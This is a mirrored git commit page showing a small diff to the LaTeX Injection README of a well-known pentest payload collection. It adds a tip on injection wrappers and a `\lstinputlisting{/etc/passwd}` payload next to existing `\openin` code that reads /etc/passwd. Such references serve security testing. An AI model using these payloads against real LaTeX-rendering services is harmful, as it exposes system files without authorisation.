mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 17:28:49 +00:00
Update README.md
This commit is contained in:
parent
f723ef4878
commit
fa3cf25c55
@ -1,5 +1,7 @@
|
|||||||
# LaTex Injection
|
# LaTex Injection
|
||||||
|
|
||||||
|
You might need to adjust injection with wrappers as `\[` or `$`.
|
||||||
|
|
||||||
## Read file
|
## Read file
|
||||||
|
|
||||||
Read file and interpret the LaTeX code in it:
|
Read file and interpret the LaTeX code in it:
|
||||||
@ -22,6 +24,7 @@ Read single lined file:
|
|||||||
Read multiple lined file:
|
Read multiple lined file:
|
||||||
|
|
||||||
```tex
|
```tex
|
||||||
|
\lstinputlisting{/etc/passwd}
|
||||||
\newread\file
|
\newread\file
|
||||||
\openin\file=/etc/passwd
|
\openin\file=/etc/passwd
|
||||||
\loop\unless\ifeof\file
|
\loop\unless\ifeof\file
|
||||||
|
Loading…
Reference in New Issue
Block a user